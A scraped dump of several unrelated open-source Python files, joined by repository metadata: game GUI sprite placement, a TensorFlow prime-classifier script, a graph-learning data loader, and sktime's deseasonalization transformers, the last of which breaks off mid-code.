self.createSimSY(globals.colors['guiwhite'], count)
def getIndustryPosition2(self, count):
"""Get Industry Position based on number of industry"""
if count <= 2:
x = -1.1 -count*0.3
z = -0.6
else:
num = count - 3
x = -1.3 -num*0.3
z = -0.2
return (x,z)
def createSimAF(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition2(count)
self.simAF = loader.loadModelCopy('%s/plane' % self.path)
self.simAF.setScale(0.25)
self.simAF.reparentTo(render)
self.simAF.setTransparency(1)
tex = loader.loadTexture('%s/af.png' % self.path)
self.simAF.setTexture(tex, 0)
self.simAF.setPos(self.x+x, self.y+0.05, self.z+z)
self.simAF.setColor(color)
self.myWidgets.append(self.simAF)
def createSimCM(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition2(count)
self.simCM = loader.loadModelCopy('%s/plane' % self.path)
self.simCM.setScale(0.25)
self.simCM.reparentTo(render)
self.simCM.setTransparency(1)
tex = loader.loadTexture('%s/cm.png' % self.path)
self.simCM.setTexture(tex, 0)
self.simCM.setPos(self.x+x, self.y+0.05, self.z+z)
self.simCM.setColor(color)
self.myWidgets.append(self.simCM)
def createSimSS(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition2(count)
self.simSS = loader.loadModelCopy('%s/plane' % self.path)
self.simSS.setScale(0.25)
self.simSS.reparentTo(render)
self.simSS.setTransparency(1)
tex = loader.loadTexture('%s/ss.png' % self.path)
self.simSS.setTexture(tex, 0)
self.simSS.setPos(self.x+x, self.y+0.05, self.z+z)
self.simSS.setColor(color)
self.myWidgets.append(self.simSS)
def createSimSC(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition2(count)
self.simSC = loader.loadModelCopy('%s/plane' % self.path)
self.simSC.setScale(0.25)
self.simSC.reparentTo(render)
self.simSC.setTransparency(1)
tex = loader.loadTexture('%s/sc.png' % self.path)
self.simSC.setTexture(tex, 0)
self.simSC.setPos(self.x+x, self.y+0.05, self.z+z)
self.simSC.setColor(color)
self.myWidgets.append(self.simSC)
def createSimDC(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition2(count)
self.simDC = loader.loadModelCopy('%s/plane' % self.path)
self.simDC.setScale(0.25)
self.simDC.reparentTo(render)
self.simDC.setTransparency(1)
tex = loader.loadTexture('%s/dc.png' % self.path)
self.simDC.setTexture(tex, 0)
self.simDC.setPos(self.x+x, self.y+0.05, self.z+z)
self.simDC.setColor(color)
self.myWidgets.append(self.simDC)
def createSimRC(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition2(count)
self.simRC = loader.loadModelCopy('%s/plane' % self.path)
self.simRC.setScale(0.25)
self.simRC.reparentTo(render)
self.simRC.setTransparency(1)
tex = loader.loadTexture('%s/rc.png' % self.path)
self.simRC.setTexture(tex, 0)
self.simRC.setPos(self.x+x, self.y+0.05, self.z+z)
self.simRC.setColor(color)
self.myWidgets.append(self.simRC)
def getIndustryPosition(self, count):
"""Get Industry Position based on number of industry"""
if count <= 3:
x = -1.1 -count*0.3
z = 0.7
else:
num = count - 4
x = -1.3 -num*0.3
z = 0.3
return (x,z)
def createSimWG(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
self.simWG = loader.loadModelCopy('%s/plane' % self.path)
self.simWG.setScale(0.25)
self.simWG.reparentTo(render)
self.simWG.setTransparency(1)
tex = loader.loadTexture('%s/wg.png' % self.path)
self.simWG.setTexture(tex, 0)
self.simWG.setPos(self.x+x, self.y+0.05, self.z+z)
self.simWG.setColor(color)
self.myWidgets.append(self.simWG)
def createSimMA(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
self.simMA = loader.loadModelCopy('%s/plane' % self.path)
self.simMA.setScale(0.25)
self.simMA.reparentTo(render)
self.simMA.setTransparency(1)
tex = loader.loadTexture('%s/ma.png' % self.path)
self.simMA.setTexture(tex, 0)
self.simMA.setPos(self.x+x, self.y+0.05, self.z+z)
self.simMA.setColor(color)
self.myWidgets.append(self.simMA)
def createSimFA(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
self.simFA = loader.loadModelCopy('%s/plane' % self.path)
self.simFA.setScale(0.25)
self.simFA.reparentTo(render)
self.simFA.setTransparency(1)
tex = loader.loadTexture('%s/fa.png' % self.path)
self.simFA.setTexture(tex, 0)
self.simFA.setPos(self.x+x, self.y+0.05, self.z+z)
self.simFA.setColor(color)
self.myWidgets.append(self.simFA)
def createSimMF(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
self.simMF = loader.loadModelCopy('%s/plane' % self.path)
self.simMF.setScale(0.25)
self.simMF.reparentTo(render)
self.simMF.setTransparency(1)
tex = loader.loadTexture('%s/mf.png' % self.path)
self.simMF.setTexture(tex, 0)
self.simMF.setPos(self.x+x, self.y+0.05, self.z+z)
self.simMF.setColor(color)
self.myWidgets.append(self.simMF)
def createSimJS(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
self.simJS = loader.loadModelCopy('%s/plane' % self.path)
self.simJS.setScale(0.25)
self.simJS.reparentTo(render)
self.simJS.setTransparency(1)
tex = loader.loadTexture('%s/js.png' % self.path)
self.simJS.setTexture(tex, 0)
self.simJS.setPos(self.x+x, self.y+0.05, self.z+z)
self.simJS.setColor(color)
self.myWidgets.append(self.simJS)
def createSimRS(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
self.simRS = loader.loadModelCopy('%s/plane' % self.path)
self.simRS.setScale(0.25)
self.simRS.reparentTo(render)
self.simRS.setTransparency(1)
tex = loader.loadTexture('%s/rs.png' % self.path)
self.simRS.setTexture(tex, 0)
self.simRS.setPos(self.x+x, self.y+0.05, self.z+z)
self.simRS.setColor(color)
self.myWidgets.append(self.simRS)
def createSimSY(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
color = self.getFunctionalColor(color, self.systemDict['usedSYC'])
self.simSY = loader.loadModelCopy('%s/plane' % self.path)
self.simSY.setScale(0.25)
self.simSY.reparentTo(render)
self.simSY.setTransparency(1)
tex = loader.loadTexture('%s/sy.png' % self.path)
self.simSY.setTexture(tex, 0)
self.simSY.setPos(self.x+x, self.y+0.05, self.z+z)
self.simSY.setColor(color)
self.myWidgets.append(self.simSY)
def createSimMI(self, color, count):
"""Create the Sim"""
(x,z) = self.getIndustryPosition(count)
color = self.getFunctionalColor(color, self.systemDict['usedMIC'])
self.simMI = loader.loadModelCopy('%s/plane' % self.path)
self.simMI.setScale(0.2)
self.simMI.reparentTo(render)
self.simMI.setTransparency(1)
tex = loader.loadTexture('%s/mi.png' % self.path)
self.simMI.setTexture(tex, 0)
self.simMI.setPos(self.x+x, self.y+0.05, self.z+z)
self.simMI.setColor(color)
self.myWidgets.append(self.simMI)
def getFunctionalColor(self, color, capacityUsed):
if color != globals.colors['guiwhite']:
return color
if capacityUsed > 0:
return globals.colors['guiyellow']
return globals.colors['guiwhite']
def rotateSim(self):
ival = self.sim.hprInterval((25.0), Vec3(360, 0, 0))
ival.loop() # keep the rotation going
def refreshResources(self):
self.clearText(self.textAL)
self.clearText(self.textEC)
self.clearText(self.textIA)
self.writeResources()
def refreshIndustrySims(self):
if self.empireID == self.mode.game.myEmpireID:
self.clearIndustrySims()
self.createIndustrySims()
def getGenResources(self):
"""Return future generation of resources as (AL,EC,IA)"""
from anw.gui import systemindustry
systemindustrygui = systemindustry.SystemIndustry(self.path, self.systemDict, self.mode.game.myEmpire,
self.mode.game.industrydata, 0)
systemindustrygui.setMyMode(self.mode)
return systemindustrygui.getCurrentProduction()
def refreshGenTradeRoute(self):
"""Refresh any GEN trade route coming from this system"""
if self.game.mode.name == 'MAP':
for tradeRouteID, tradeRouteDict in self.game.tradeRoutes.iteritems():
if tradeRouteDict['fromSystem'] == self.id and tradeRouteDict['type'] == 'GEN':
self.game.mode.traderoutes[tradeRouteID].refreshResources()
class BackgroundSystem(System):
"""A Background System that is not clickable, just for viewing"""
def __init__(self, path, mode, systemDict,glow=1):
System.__init__(self, path, mode, systemDict)
self.scale = 10
self.y = 50
self.x = 30
self.z = 30
self.createMyBackgroundSim(glow)
def createMySim(self):
pass
def createMyBackgroundSim(self, glow=1):
self.registerMySim()
self.loadMyTexture()
if glow == 1:
self.setGlow()
self.setColor()
self.setPos()
#self.writeName()
#self.writeCityNum()
self.rotateSim()
def rotateSim(self):
ival = self.sim.hprInterval((180.0), Vec3(360, 0, 0))
ival.loop() # keep the rotation going
def setPositions(self):
pass
def writeName(self):
"""Write the tech name"""
if 'availWGC' in self.systemDict.keys():
availWGC = self.systemDict['availWGC']
if availWGC != 0:
text = '%s -> (%d/%d)' % (self.systemDict['name'], self.systemDict['usedWGC'], availWGC)
else:
text = self.systemDict['name']
else:
text = self.systemDict['name']
self.clearText(self.textName)
self.textName = textonscreen.TextOnScreen(self.path, text, 8, font=1)
self.textName.writeTextToScreen(self.x-20, self.y, self.z+20, wordwrap=14)
self.textName.setColor(globals.colors[self.color1])
def writeCityNum(self):
"""Write City Number"""
text = '%s' % self.systemDict['cities']
self.createSimCity(globals.colors[self.color1])
self.textCityNum = textonscreen.TextOnScreen(self.path, text, 10, font=1)
self.textCityNum.writeTextToScreen(self.x-29, self.y, self.z+13, wordwrap=10)
self.textCityNum.setColor(globals.colors[self.color1])
if __name__ == "__main__":
mediaPath = 'media'
mySystemDict = {'id':'1', 'name':'Test System', 'x':0, 'y':0, 'myEmpireID':'1', 'cities':15}
system1 = System(mediaPath, None, mySystemDict)
run() | [
"chrislewis@pop-os.localdomain"
] | chrislewis@pop-os.localdomain |
330964458b683417af13bb09e391dae363e3ee81 | 32e70912e65f34886dc89297e2551059703fa28f | /primes.py | f69e47351d60b120cfe85ee5321af83d3a9eea64 | [] | no_license | kaa-the-snake/tf_basics | 39bf01a3c9684e6eea88b378d766c8784d32576d | d377c585918d2eadaf38a51399e711ba9f34bbbf | refs/heads/master | 2021-01-25T05:57:34.651752 | 2017-02-01T20:08:31 | 2017-02-01T20:08:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,926 | py | #!/usr/bin/python
import tensorflow as tf
import numpy as np
import random
def eratosphen(n):
res, mask = [], [True] * n
for i in xrange(2, n):
if not mask[i]:
continue
res.append(i)
for j in xrange(2 * i, n, i):
mask[j] = False
return res, mask
def generate_data(bits):
x, y = np.ndarray([2 ** bits, bits, 1], np.float32), np.ndarray([2 ** bits, 1], np.float32)
_, mask = eratosphen(2 ** bits)
for k in xrange(2 ** bits):
n = k
for i in xrange(bits):
x[k][i][0] = n % 2
n /= 2
y[k][0] = 1.0 if mask[k] else 0.0
return x, y
# do all stuff
def main():
# define params
max_time, state_size, eps, learning_rate = 16, 32, 0.01, 0.001
gru = tf.nn.rnn_cell.GRUCell(state_size)
w = tf.Variable(tf.random_normal([state_size, 1]))
b = tf.Variable(tf.random_normal([1]))
# create learning graph
x = tf.placeholder(tf.float32, [None, max_time, 1])
with tf.variable_scope('train'):
output, state = tf.nn.dynamic_rnn(gru, x, dtype = tf.float32)
y = tf.placeholder(tf.float32, [None, 1])
output = output[:, max_time - 1, :]
output = tf.sigmoid(tf.add(tf.matmul(output, w), b))
#output = tf.add(tf.matmul(output, w), b)
# define loss and optimizer
loss = tf.nn.l2_loss(tf.subtract(output, y))
#loss = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(output, y))
optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss)
# begin training
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
cnt = 0
data_x, data_y = generate_data(max_time)
while True:
res, l = sess.run([optimizer, loss], feed_dict = {x: data_x, y: data_y})
print l
cnt += 1
if l <= eps:
break
# entry point
if __name__ == "__main__":
main()
| [
"accs@vnik.me"
] | accs@vnik.me |
fbac00a832f23f89bb0f12e137cb3464bdaf6864 | eb051a9dd600024c54a81fae9e90b8bd1d54db4d | /erpnext_prime/erpnext_prime/doctype/prime_settings/prime_settings.py | 609dd37624ab68e45cd56773dcc8fc2b7e0b4e7d | [
"MIT"
] | permissive | techlift-tech/erpnext_prime | ce0fbc40797506d3e5194aa8da78106b808c6181 | 73e53e557eea9c46ba2caffdc983c630f00b643d | refs/heads/master | 2021-06-26T19:44:18.060729 | 2020-11-04T06:15:04 | 2020-11-04T06:15:04 | 183,427,158 | 0 | 1 | NOASSERTION | 2020-03-05T09:49:33 | 2019-04-25T12:11:31 | Python | UTF-8 | Python | false | false | 281 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Techlift Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class PrimeSettings(Document):
pass
| [
"palash@techlift.in"
] | palash@techlift.in |
2266c46d52769f067fd7f36262c25992404375db | 7d14cc8ffbc34b149981889fa1b3786b803b25b2 | /32_Inheritance.py | f1edc058e265e7deb0432da9d51a6dea024301a9 | [] | no_license | lcanalest/python_for_beginners | 30bfbdbb75b7ac0d753acb218c9b41789966929b | 9bdae7f8b33fe8ca25a6481ccc2e88bcfec65fab | refs/heads/master | 2020-12-21T09:44:13.844493 | 2020-01-28T17:34:04 | 2020-01-28T17:34:04 | 236,389,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | # Inheritance (4:12:38)
from Chef import Chef
from ChineseChef import ChineseChef
normal_chef = Chef()
chinese_chef = ChineseChef()
normal_chef.make_chicken()
chinese_chef.make_chicken()
normal_chef.make_special_dish()
chinese_chef.make_special_dish() | [
"luis.canalest@gmail.com"
] | luis.canalest@gmail.com |
0ad030301724d26610e72fab67a331ea0cc126de | d41734a461b032d95cde30bf07061d4bc8e00b5b | /Code/utils.py | 75ed3cc7594753085975cd4f406f5d7e67d30c48 | [] | no_license | KamranMK/MG2Vec- | 65855f64b81e154631cf0d21cd8be625ed92c3f5 | 4662753bf42c295e8d8ce3a595aab46f8a5f0c4c | refs/heads/master | 2023-07-11T15:03:16.578057 | 2020-09-15T08:03:48 | 2020-09-15T08:03:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | import numpy as np
import scipy.sparse as sp
import torch
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)
return labels_onehot
def load_data(path="./", dataset="cora"):
"""Load citation network dataset (cora only for now)"""
print('Loading {} dataset...'.format(dataset))
# idx_features_labels = np.genfromtxt("{}{}.content".format(path, dataset), dtype=np.dtype(str))
idx_features_labels = np.genfromtxt("node_features_EU.txt", dtype=np.dtype(str))
features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)
# labels = encode_onehot(idx_features_labels[:, -1])
# build graph
idx = np.array(idx_features_labels[:, 0], dtype=np.int32)
idx_map = {j: i for i, j in enumerate(idx)}
edges_unordered = np.genfromtxt("{}{}.cites".format(path, "Train_EU_layer0"), dtype=np.int32)
# edges_unordered = np.genfromtxt("{}{}.cites".format(path, dataset), dtype=np.int32)
edges = np.array(list(map(idx_map.get, edges_unordered.flatten())), dtype=np.int32).reshape(edges_unordered.shape)
adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])), shape=(features.shape[0], features.shape[0]), dtype=np.float32)
# build symmetric adjacency matrix
adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)
features = normalize_features(features)
adj = normalize_adj(adj + sp.eye(adj.shape[0]))
idx_train = range(idx.size)
adj = torch.FloatTensor(np.array(adj.todense()))
features = torch.FloatTensor(np.array(features.todense()))
# labels = torch.LongTensor(np.where(labels)[1])
adj_L = sp.coo_matrix([sp.coo_matrix(mat) for mat in np.load("target_L.npz")])
adj_L = [adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj) for adj in adj_L]
adj_L = [normalize_adj(adj + sp.eye(adj.shape[0])) for adj in adj_L]
adj_L = torch.FloatTensor([torch.FloatTensor(np.array(adj.todense())) for adj in adj_L])
idx_train = torch.LongTensor(idx_train)
return adj,adj_L, features, idx_train
# return adj, features, labels, idx_train, idx_val, idx_test
def normalize_adj(mx):
"""Row-normalize sparse matrix"""
rowsum = np.array(mx.sum(1))
r_inv_sqrt = np.power(rowsum, -0.5).flatten()
r_inv_sqrt[np.isinf(r_inv_sqrt)] = 0.
r_mat_inv_sqrt = sp.diags(r_inv_sqrt)
return mx.dot(r_mat_inv_sqrt).transpose().dot(r_mat_inv_sqrt)
def normalize_features(mx):
"""Row-normalize sparse matrix"""
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = r_mat_inv.dot(mx)
return mx
def accuracy(output, labels):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum()
return correct / len(labels) | [
"noreply@github.com"
] | KamranMK.noreply@github.com |
c5d0d0c338ada160cfe71dbf39008f8f29b820c2 | b347bc4b850dee4a8a9a171b563a3f31230ce1c7 | /sktime/transformations/series/detrend/_deseasonalize.py | a0bab72194a91c2333d9664f368666d36ad498a6 | [
"BSD-3-Clause"
] | permissive | sktime/sktime | 5963962df338c5931a2f9f1794d1203c50ddc27e | 70b2bfaaa597eb31bc3a1032366dcc0e1f4c8a9f | refs/heads/main | 2023-08-22T18:20:08.022950 | 2023-08-22T15:24:39 | 2023-08-22T15:24:39 | 156,401,841 | 1,117 | 268 | BSD-3-Clause | 2023-09-14T20:44:21 | 2018-11-06T15:08:24 | Python | UTF-8 | Python | false | false | 21,903 | py | #!/usr/bin/env python3 -u
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""Implements transformations to deseasonalize a timeseries."""
__author__ = ["mloning", "eyalshafran", "aiwalter"]
__all__ = ["Deseasonalizer", "ConditionalDeseasonalizer", "STLTransformer"]
import numpy as np
import pandas as pd
from sktime.transformations.base import BaseTransformer
from sktime.utils.datetime import _get_duration, _get_freq
from sktime.utils.seasonality import autocorrelation_seasonality_test
from sktime.utils.validation.forecasting import check_sp
class Deseasonalizer(BaseTransformer):
"""Remove seasonal components from a time series.
Applies `statsmodels.tsa.seasonal.seasonal_compose` and removes the `seasonal`
component in `transform`. Adds seasonal component back again in `inverse_transform`.
Seasonality removal can be additive or multiplicative.
`fit` computes :term:`seasonal components <Seasonality>` and
stores them in `seasonal_` attribute.
`transform` aligns seasonal components stored in `seasonal_` with
the time index of the passed :term:`series <Time series>` and then
substracts them ("additive" model) from the passed :term:`series <Time series>`
or divides the passed series by them ("multiplicative" model).
Parameters
----------
sp : int, default=1
Seasonal periodicity.
model : {"additive", "multiplicative"}, default="additive"
Model to use for estimating seasonal component.
Attributes
----------
seasonal_ : array of length sp
Seasonal components computed in seasonal decomposition.
See Also
--------
ConditionalDeseasonalizer
Notes
-----
For further explanation on seasonal components and additive vs.
multiplicative models see
`Forecasting: Principles and Practice <https://otexts.com/fpp3/components.html>`_.
Seasonal decomposition is computed using `statsmodels
<https://www.statsmodels.org/stable/generated/statsmodels.tsa.seasonal.seasonal_decompose.html>`_.
Examples
--------
>>> from sktime.transformations.series.detrend import Deseasonalizer
>>> from sktime.datasets import load_airline
>>> y = load_airline() # doctest: +SKIP
>>> transformer = Deseasonalizer() # doctest: +SKIP
>>> y_hat = transformer.fit_transform(y) # doctest: +SKIP
"""
_tags = {
"scitype:transform-input": "Series",
# what is the scitype of X: Series, or Panel
"scitype:transform-output": "Series",
# what scitype is returned: Primitives, Series, Panel
"scitype:instancewise": True, # is this an instance-wise transform?
"X_inner_mtype": "pd.Series",
# which mtypes do _fit/_predict support for X?
"y_inner_mtype": "None", # which mtypes do _fit/_predict support for y?
"fit_is_empty": False,
"capability:inverse_transform": True,
"transform-returns-same-time-index": True,
"univariate-only": True,
"python_dependencies": "statsmodels",
}
def __init__(self, sp=1, model="additive"):
self.sp = check_sp(sp)
allowed_models = ("additive", "multiplicative")
if model not in allowed_models:
raise ValueError(
f"`model` must be one of {allowed_models}, " f"but found: {model}"
)
self.model = model
self._X = None
self.seasonal_ = None
super().__init__()
def _align_seasonal(self, X):
"""Align seasonal components with X's time index."""
shift = (
-_get_duration(
X.index[0],
self._X.index[0],
coerce_to_int=True,
unit=_get_freq(self._X.index),
)
% self.sp
)
return np.resize(np.roll(self.seasonal_, shift=shift), X.shape[0])
def _fit(self, X, y=None):
"""Fit transformer to X and y.
private _fit containing the core logic, called from fit
Parameters
----------
X : pd.Series
Data to fit transform to
y : ignored argument for interface compatibility
Returns
-------
self: a fitted instance of the estimator
"""
from statsmodels.tsa.seasonal import seasonal_decompose
self._X = X
sp = self.sp
# apply seasonal decomposition
self.seasonal_ = seasonal_decompose(
X,
model=self.model,
period=sp,
filt=None,
two_sided=True,
extrapolate_trend=0,
).seasonal.iloc[:sp]
return self
def _private_transform(self, y, seasonal):
if self.model == "additive":
return y - seasonal
else:
return y / seasonal
def _private_inverse_transform(self, y, seasonal):
if self.model == "additive":
return y + seasonal
else:
return y * seasonal
def _transform(self, X, y=None):
"""Transform X and return a transformed version.
private _transform containing the core logic, called from transform
Parameters
----------
X : pd.Series
Data to be transformed
y : ignored argument for interface compatibility
Additional data, e.g., labels for transformation
Returns
-------
Xt : pd.Series
transformed version of X, detrended series
"""
seasonal = self._align_seasonal(X)
Xt = self._private_transform(X, seasonal)
return Xt
def _inverse_transform(self, X, y=None):
"""Logic used by `inverse_transform` to reverse transformation on `X`.
Parameters
----------
X : pd.Series or pd.DataFrame
Data to be inverse transformed
y : ignored argument for interface compatibility
Additional data, e.g., labels for transformation
Returns
-------
Xt : pd.Series or pd.DataFrame, same type as X
inverse transformed version of X
"""
seasonal = self._align_seasonal(X)
Xt = self._private_inverse_transform(X, seasonal)
return Xt
def _update(self, X, y=None, update_params=False):
"""Update transformer with X and y.
private _update containing the core logic, called from update
Parameters
----------
X : pd.Series
Data to fit transform to
y : ignored argument for interface compatibility
Additional data, e.g., labels for transformation
Returns
-------
self: a fitted instance of the estimator
"""
X_full = X.combine_first(self._X)
self._X = X_full
if update_params:
self._fit(X_full, update_params=update_params)
return self
@classmethod
def get_test_params(cls, parameter_set="default"):
"""Return testing parameter settings for the estimator.
Parameters
----------
parameter_set : str, default="default"
Name of the set of test parameters to return, for use in tests. If no
special parameters are defined for a value, will return `"default"` set.
There are currently no reserved values for transformers.
Returns
-------
params : dict or list of dict, default = {}
Parameters to create testing instances of the class
Each dict are parameters to construct an "interesting" test instance, i.e.,
`MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.
`create_test_instance` uses the first (or only) dictionary in `params`
"""
params = {}
params2 = {"sp": 2}
return [params, params2]
class ConditionalDeseasonalizer(Deseasonalizer):
"""Remove seasonal components from time series, conditional on seasonality test.
Fit tests for :term:`seasonality <Seasonality>` and if the passed time series
has a seasonal component it applies seasonal decomposition provided by `statsmodels
<https://www.statsmodels.org>`
to compute the seasonal component.
If the test is negative `_seasonal` is set
to all ones (if `model` is "multiplicative")
or to all zeros (if `model` is "additive").
Transform aligns seasonal components stored in `seasonal_` with
the time index of the passed series and then
substracts them ("additive" model) from the passed series
or divides the passed series by them ("multiplicative" model).
Parameters
----------
seasonality_test : callable or None, default=None
Callable that tests for seasonality and returns True when data is
seasonal and False otherwise. If None,
90% autocorrelation seasonality test is used.
sp : int, default=1
Seasonal periodicity.
model : {"additive", "multiplicative"}, default="additive"
Model to use for estimating seasonal component.
Attributes
----------
seasonal_ : array of length sp
Seasonal components.
is_seasonal_ : bool
Return value of `seasonality_test`. True when data is
seasonal and False otherwise.
See Also
--------
Deseasonalizer
Notes
-----
For further explanation on seasonal components and additive vs.
multiplicative models see
`Forecasting: Principles and Practice <https://otexts.com/fpp3/components.html>`_.
Seasonal decomposition is computed using `statsmodels
<https://www.statsmodels.org/stable/generated/statsmodels.tsa.seasonal.seasonal_decompose.html>`_.
Examples
--------
>>> from sktime.transformations.series.detrend import ConditionalDeseasonalizer
>>> from sktime.datasets import load_airline
>>> y = load_airline() # doctest: +SKIP
>>> transformer = ConditionalDeseasonalizer(sp=12) # doctest: +SKIP
>>> y_hat = transformer.fit_transform(y) # doctest: +SKIP
"""
def __init__(self, seasonality_test=None, sp=1, model="additive"):
self.seasonality_test = seasonality_test
self.is_seasonal_ = None
super().__init__(sp=sp, model=model)
def _check_condition(self, y):
"""Check if y meets condition."""
if not callable(self.seasonality_test_):
raise ValueError(
f"`func` must be a function/callable, but found: "
f"{type(self.seasonality_test_)}"
)
is_seasonal = self.seasonality_test_(y, sp=self.sp)
if not isinstance(is_seasonal, (bool, np.bool_)):
raise ValueError(
f"Return type of `func` must be boolean, "
f"but found: {type(is_seasonal)}"
)
return is_seasonal
def _fit(self, X, y=None):
"""Fit transformer to X and y.
private _fit containing the core logic, called from fit
Parameters
----------
X : pd.Series
Data to fit transform to
y : ignored argument for interface compatibility
Returns
-------
self: a fitted instance of the estimator
"""
from statsmodels.tsa.seasonal import seasonal_decompose
self._X = X
sp = self.sp
# set default condition
if self.seasonality_test is None:
self.seasonality_test_ = autocorrelation_seasonality_test
else:
self.seasonality_test_ = self.seasonality_test
# check if data meets condition
self.is_seasonal_ = self._check_condition(X)
if self.is_seasonal_:
# if condition is met, apply de-seasonalisation
self.seasonal_ = seasonal_decompose(
X,
model=self.model,
period=sp,
filt=None,
two_sided=True,
extrapolate_trend=0,
).seasonal.iloc[:sp]
else:
# otherwise, set idempotent seasonal components
self.seasonal_ = (
np.zeros(self.sp) if self.model == "additive" else np.ones(self.sp)
)
return self
class STLTransformer(BaseTransformer):
"""Remove seasonal components from a time-series using STL.
Interfaces STL from statsmodels as an sktime transformer.
The STLTransformer is a descriptive transformer to remove seasonality
from a series and is based on statsmodels.STL. It returns deseasonalized
data. Components are returned in addition if return_components=True
STLTransformer can not inverse_transform on indices not seen in fit().
This means that for pipelining, the Deseasonalizer or Detrender must be
used instead of STLTransformer.
Important note: the returned series has seasonality removed, but not trend.
Parameters
----------
sp : int, default=1
Seasonal periodicity.
seasonal : int, default=7
Length of the seasonal smoother. Must be an odd integer, and should
normally be >= 7 (default).
trend : {int, default=None}
Length of the trend smoother. Must be an odd integer. If not provided
uses the smallest odd integer greater than
1.5 * period / (1 - 1.5 / seasonal), following the suggestion in
the original implementation.
low_pass : {int, default=None}
Length of the low-pass filter. Must be an odd integer >=3. If not
provided, uses the smallest odd integer > period.
seasonal_deg : int, default=1
Degree of seasonal LOESS. 0 (constant) or 1 (constant and trend).
trend_deg : int, default=1
Degree of trend LOESS. 0 (constant) or 1 (constant and trend).
low_pass_deg : int, default=1
Degree of low pass LOESS. 0 (constant) or 1 (constant and trend).
robust : bool, default False
Flag indicating whether to use a weighted version that is robust to
some forms of outliers.
seasonal_jump : int, default=1
Positive integer determining the linear interpolation step. If larger
than 1, the LOESS is used every seasonal_jump points and linear
interpolation is between fitted points. Higher values reduce
estimation time.
trend_jump : int, default=1
Positive integer determining the linear interpolation step. If larger
than 1, the LOESS is used every trend_jump points and values between
the two are linearly interpolated. Higher values reduce estimation
time.
low_pass_jump : int, default=1
Positive integer determining the linear interpolation step. If larger
than 1, the LOESS is used every low_pass_jump points and values between
the two are linearly interpolated. Higher values reduce estimation
time.
return_components : bool, default=False
if False, will return only the STL transformed series
if True, will return the transformed series, as well as three components
as variables in the returned multivariate series (DataFrame cols)
"transformed" - the transformed series
"seasonal" - the seasonal component
"trend" - the trend component
"resid" - the residuals after de-trending, de-seasonalizing
Attributes
----------
trend_ : pd.Series
Trend component of series seen in fit.
seasonal_ : pd.Series
Seasonal components of series seen in fit.
resid_ : pd.Series
Residuals component of series seen in fit.
See Also
--------
Detrender
Deseasonalizer
STLForecaster
References
----------
.. [1] https://www.statsmodels.org/devel/generated/statsmodels.tsa.seasonal.STL.html
Examples
--------
>>> from sktime.datasets import load_airline
>>> from sktime.transformations.series.detrend import STLTransformer
>>> X = load_airline() # doctest: +SKIP
>>> transformer = STLTransformer(sp=12) # doctest: +SKIP
>>> Xt = transformer.fit_transform(X) # doctest: +SKIP
"""
_tags = {
"scitype:transform-input": "Series",
# what is the scitype of X: Series, or Panel
"scitype:transform-output": "Series",
# what scitype is returned: Primitives, Series, Panel
"scitype:instancewise": True, # is this an instance-wise transform?
"X_inner_mtype": "pd.Series", # which mtypes do _fit/_predict support for X?
"y_inner_mtype": "pd.Series", # which mtypes do _fit/_predict support for y?
"transform-returns-same-time-index": True,
"univariate-only": True,
"fit_is_empty": False,
"python_dependencies": "statsmodels",
}
def __init__(
self,
sp=2,
seasonal=7,
trend=None,
low_pass=None,
seasonal_deg=1,
trend_deg=1,
low_pass_deg=1,
robust=False,
seasonal_jump=1,
trend_jump=1,
low_pass_jump=1,
return_components=False,
):
self.sp = check_sp(sp)
# The statsmodels.tsa.seasonal.STL can only deal with sp >= 2
if sp < 2:
raise ValueError("sp must be positive integer >= 2")
self.seasonal = seasonal
self.trend = trend
self.low_pass = low_pass
self.seasonal_deg = seasonal_deg
self.trend_deg = trend_deg
self.low_pass_deg = low_pass_deg
self.robust = robust
self.seasonal_jump = seasonal_jump
self.trend_jump = trend_jump
self.low_pass_jump = low_pass_jump
self.return_components = return_components
self._X = None
super().__init__()
def _fit(self, X, y=None):
"""Fit transformer to X and y.
private _fit containing the core logic, called from fit
Parameters
----------
X : pd.Series
Data to fit transform to
y : ignored argument for interface compatibility
Returns
-------
self: a fitted instance of the estimator
"""
from statsmodels.tsa.seasonal import STL as _STL
# remember X for transform
self._X = X
sp = self.sp
self.stl_ = _STL(
X.values,
period=sp,
seasonal=self.seasonal,
trend=self.trend,
low_pass=self.low_pass,
seasonal_deg=self.seasonal_deg,
trend_deg=self.trend_deg,
